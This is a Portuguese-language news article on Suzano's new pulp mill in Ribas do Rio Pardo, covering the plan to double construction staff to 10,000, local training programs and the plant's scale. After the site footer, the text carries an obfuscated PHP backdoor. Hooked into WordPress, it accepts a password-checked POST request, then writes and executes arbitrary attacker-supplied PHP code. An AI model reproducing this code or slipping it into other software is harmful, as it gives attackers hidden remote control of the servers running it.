• SEJA BEM-VINDO

Fábrica de celulose deve dobrar mão de obra e contar com 10 mil operários no início de 2023

Publicado em: 28/09/2022 Atualizado:: setembro 28, 2022

Cerca de 5 mil operários já trabalham na obra e número deve chegara a 10 mil em, 2023 (Foto: Divulgação)

 

Com investimento de R$ 19,3 bilhões, a nova fábrica de celulose da Suzano em Ribas do Rio Pardo, a 100 quilômetros da Capital, planeja dobrar o número de trabalhadores no primeiro semestre de 2023. A expectativa do grupo é contar com 10 mil operários, contra os 5 mil empregados atualmente na obra.

 

No total, o número de empregos gerados é ainda maior, porque inclui os trabalhadores no plantio de eucalipto. “A Suzano mantém hoje 6 mil postos de trabalho, entre próprios e terceiros, nas operações industrial e florestal de Três Lagoas e região, sendo a grande maioria deles ocupados por moradores dos municípios onde mantemos nossas operações, conforme nossa política de valorização da mão de obra local”, informou a assessoria de imprensa.

 

A empresa vem priorizando a contratação de trabalhadores da região. No entanto, operários de outros municípios e até de outros estados também estão envolvidos no projeto. Alguns estão pernoitando em Campo Grande e fazem o percurso diário de 100 quilômetros para ir e voltar.

 

Além disso, a empresa tem oferecido cursos de capacitação para formar a mão de obra. “Frequentemente, a Suzano tem oferecido cursos de capacitação para atender a demanda em Ribas do Rio Pardo. “Abrimos um total de 608 vagas nos cursos de capacitação, com bolsas que variam entre R$ 400,00 e R$ 1.500,00. Já formamos 197 pessoas apenas na área industrial e, mais 199 pessoas na área florestal e, nos próximos meses, teremos outras 138 em formação”, informou.

 

“A qualificação profissional é uma das principais preocupações e contribuições da Suzano quanto ao desenvolvimento das pessoas e da região onde está se instalando, da mesma forma que trabalhamos nesse sentido quando implantamos as nossas duas fábricas em Três Lagoas”, destacou.

Na fase de operação da fábrica, a expectativa é gerar 3 mil empregos diretos e indiretos. A monumental obra, que prevê a produção de 2,55 milhões de celulose de eucalipto por ano, deve ser concluída no segundo semestre de 2024.

 

“As obras da nova fábrica já entraram na fase de verticalização com a implantação de pilares pré-moldados de concreto. Os maiores deles até agora têm 21 metros de altura e 52 toneladas cada – o que equivale a quase 60 carros populares”, informa a Suzano no relatório do andamento da obra.

 

Nova indústria vai produzir 2,5 milhões de toneladas de celulose por ano (Foto: Divulgação)

 

“Uma das grandes estruturas verticais que contam com pilares pré-moldados são as Máquinas Extratoras, que têm a função de secar a celulose na etapa das Máquinas Extratoras. Só elas contarão com 27 pilares dessa magnitude, de um total de 262 pilares”, informou.

 

Esta será a 3ª fábrica de celulose de MS e se juntará a outras duas em Três Lagoas, da Eldorado Celulose e Fibria. O grupo chileno Arauco deve tirar do papel uma 4ª indústria, lançada na gestão de André Puccinelli (MDB) e confirmada no atual mandato de Reinaldo Azambuja (PSDB), em Inocência.

 

………………………

 

Fonte: Ojacare

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}